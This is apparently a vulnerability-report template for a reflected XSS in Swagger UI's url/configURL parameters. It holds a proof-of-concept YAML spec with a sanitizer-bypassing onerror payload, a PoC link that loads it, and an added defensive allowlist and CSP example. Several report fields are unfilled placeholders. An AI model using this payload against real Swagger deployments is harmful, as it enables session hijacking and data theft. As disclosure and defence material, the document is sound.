# Swagger Reflected XSS Vulnerability in "URL/configURL" Parameter on "Endpoint"
## Overview
Vulnerability Type: Reflected Cross-Site Scripting (XSS)
Affected Component: Swagger UI
Location: [https://the-red.team/templates/swagger-xss](https://the-red.team/templates/swagger-xss)
Parameter: `URL/configURL`
Severity: Medium (6.1)
CVE ID: CVE-2016-1000229
CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

## Description
An XSS vulnerability has been identified in the Swagger UI component, specifically in its handling of YAML configuration files imported via the `url` and `configURL` parameters. This vulnerability arises due to inadequate input validation and sanitization of user-supplied data in the Swagger UI interface, allowing an attacker to inject and execute arbitrary JavaScript code within the context of a user's browser.

## Impact
If successfully exploited, this vulnerability could lead to various attacks, including but not limited to:
- Session hijacking
- Data theft
- Malicious code execution
- Defacement of the application

## Affected Versions
The vulnerability has been confirmed in the following versions:
- Swagger UI 3.14.0 < 3.38.0

Other versions might also be affected, and it is recommended to assess all versions of the Swagger UI component.

## Recommendation
To mitigate the risk associated with this vulnerability, the following actions are recommended:

1. Update: Apply the latest patches or updates provided by the vendor to address this vulnerability. (See [https://swagger.io/tools/swagger-ui/](https://swagger.io/tools/swagger-ui/))
2. Input Sanitization: Implement strict input validation and sanitization mechanisms to prevent malicious inputs from being processed.
3. Content Security Policy (CSP): Enforce a robust CSP to restrict the execution of unauthorized scripts.
4. Security Headers: Configure appropriate security headers (e.g., X-XSS-Protection) to enhance browser security.
5. Regular Security Audits: Conduct regular security audits and penetration testing to identify and remediate vulnerabilities proactively.
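The advisory's mitigation list above stays at the level of principles. The block below is an added example, not code from the advisory, from the-red.team or from the Swagger UI project, of what items 2 and 3 look like in practice for this specific parameter: an allowlist check on the `url` / `configURL` query values before Swagger UI is initialised with them, and a Content-Security-Policy that keeps the inline `onerror=` handler in the PoC YAML from running even if it reaches the DOM. The origin `https://api.example.internal` and the sample page URLs are constructed placeholders; the `style-src 'unsafe-inline'` exception is an assumption about Swagger UI's own styling and is not part of the script policy.

```javascript
// Added example (not from the advisory): allowlist check for the Swagger UI
// `url` / `configURL` query parameters, plus a CSP that blocks inline scripts.
// ALLOWED_SPEC_ORIGINS is a constructed placeholder list for illustration.
const ALLOWED_SPEC_ORIGINS = [
  'https://api.example.internal', // constructed: where our own specs are hosted
];

/**
 * Returns the validated spec URL string, or null when the value must be rejected.
 * Only absolute https URLs on an allowlisted origin pass, so a link such as
 * ?url=https://attacker.example/spec.yaml is never fetched by the UI.
 */
function validateSpecUrl(raw, allowedOrigins = ALLOWED_SPEC_ORIGINS) {
  if (typeof raw !== 'string' || raw.length === 0 || raw.length > 2048) return null;
  let parsed;
  try {
    // Absolute parse only: relative paths throw here; javascript:, data: and
    // http: values parse but fail the protocol check below.
    parsed = new URL(raw);
  } catch {
    return null;
  }
  if (parsed.protocol !== 'https:') return null;
  if (parsed.username || parsed.password) return null;      // no credentials in spec URLs
  if (!allowedOrigins.includes(parsed.origin)) return null; // origin = scheme + host + port
  return parsed.href;
}

/**
 * Pulls `url` and `configURL` out of a page URL and validates each one.
 * Returns the values Swagger UI may actually be initialised with (null = drop).
 */
function resolveSpecParams(pageHref, allowedOrigins = ALLOWED_SPEC_ORIGINS) {
  const params = new URL(pageHref).searchParams;
  return {
    url: validateSpecUrl(params.get('url'), allowedOrigins),
    configUrl: validateSpecUrl(params.get('configURL'), allowedOrigins),
  };
}

/**
 * CSP for the page that hosts Swagger UI: no 'unsafe-inline' in script-src, so
 * an injected onerror= handler is refused, and connect-src is limited to the
 * same allowlist so the UI cannot load specs from anywhere else.
 */
function buildCsp(allowedOrigins = ALLOWED_SPEC_ORIGINS) {
  const specSources = allowedOrigins.join(' ');
  return [
    "default-src 'self'",
    "script-src 'self'",
    `connect-src 'self' ${specSources}`,
    "img-src 'self' data:",
    "style-src 'self' 'unsafe-inline'", // assumption: needed for the UI's inline styles
    "object-src 'none'",
    "base-uri 'self'",
    "frame-ancestors 'none'",
  ].join('; ');
}

// Constructed sample page URLs, as a request handler might see them.
const samples = [
  'https://test.test/swagger?url=https://api.example.internal/openapi.yaml',
  'https://test.test/swagger?url=https://the-red.team/poc/swagger-xss.yaml',
  'https://test.test/swagger?configURL=http://api.example.internal/config.json',
  'https://test.test/swagger?url=javascript:alert(1)',
];
for (const s of samples) {
  console.log(s, '->', JSON.stringify(resolveSpecParams(s)));
}
console.log('Content-Security-Policy:', buildCsp());
```

Both checks run before the parameter ever reaches Swagger UI, so the second sample (the PoC spec) resolves to `null` and is never fetched. The allowlist addresses the delivery vector only; the rendered `description` field still has to go through a real HTML sanitizer, which is what the vendor update in item 1 provides and which this example does not reimplement.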

## Steps to Reproduce
The following steps demonstrate how an attacker could exploit this vulnerability:
1. Access the Swagger UI interface located at [vulnerable-url.com/swagger](vulnerable-url.com/swagger)
2. Access the payload using [https://the-red.team/poc/swagger-xss.yaml](https://the-red.team/poc/swagger-xss.yaml) or host the file below, making sure to set the appropriate response headers (CORS) so the Swagger UI page can fetch it.

```yaml
swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
```
3. Import a YAML configuration file using the "url" or "configURL" parameter.
4. Inject and submit a malicious JavaScript payload within the YAML file.
5. Observe if the payload gets executed within the context of the application.

## Proof of Concept (PoC)
Visit the following URL to see that the script is executed: [https://test.test/swagger?url=https://the-red.team/poc/swagger-xss.yaml](https://test.test/swagger?url=https://the-red.team/poc/swagger-xss.yaml)

## Additional Information
Vendor Advisory: [Link to vendor advisory, if available]
CVE Details: [Link to CVE details, if applicable]

Contact: [Your contact information]
Date Reported: [Date of reporting]
PoC YAML file:

## References
- [https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/](https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/)
- [https://the-red.team/poc/swagger-xss.yaml](https://the-red.team/poc/swagger-xss.yaml)
- [https://the-red.team/templates/swagger-xss](https://the-red.team/templates/swagger-xss)